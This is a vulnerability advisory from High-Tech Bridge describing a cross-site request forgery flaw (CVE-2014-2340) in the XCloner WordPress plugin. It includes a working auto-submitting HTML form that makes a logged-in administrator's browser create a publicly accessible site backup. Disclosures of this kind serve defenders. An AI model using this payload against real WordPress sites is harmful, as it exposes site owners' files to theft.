Сross-Site Request Forgery (CSRF) in XCloner Wordpress Plugin

2014-03-12T00:00:00
ID HTB23206
Type htbridge
Reporter High-Tech Bridge
Modified 2014-03-13T00:00:00

Description

High-Tech Bridge Security Research Lab discovered vulnerability in XCloner Wordpress plugin, which can be exploited to perform a CSRF attack and gain access to a backed-up copy of vulnerable website.

Сross-Site Request Forgery (CSRF) in XCloner Wordpress Plugin: CVE-2014-2340
The vulnerability exists due to insufficient verification of HTTP request origin. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and create a website backup.
Simple exploit code below will create new backup with all website files (no SQL database), which will be publicly accessible on the http://[host]/administrator/backups/backup.tar URL:
<form action="http://[host]/wp-admin/plugins.php?page=xcloner_show&option=com_clon er&task=confirm" method="post" name="main">
<input type="hidden" name="dbbackup" value="1">
<input type="hidden" name="dbbackup_comp" value="">
<input type="hidden" name="bname" value="backup">
<input type="hidden" name="backupComments" value="">
<input type="hidden" name="option" value="com_cloner">
<input type="hidden" name="task" value="generate">
<input type="hidden" name="boxchecked" value="0">
<input type="hidden" name="hidemainmenu" value="0">
<input type="hidden" name="" value="">
<input type="submit" name="run" value="run">
</form>
<script>
document.main.submit();
</script>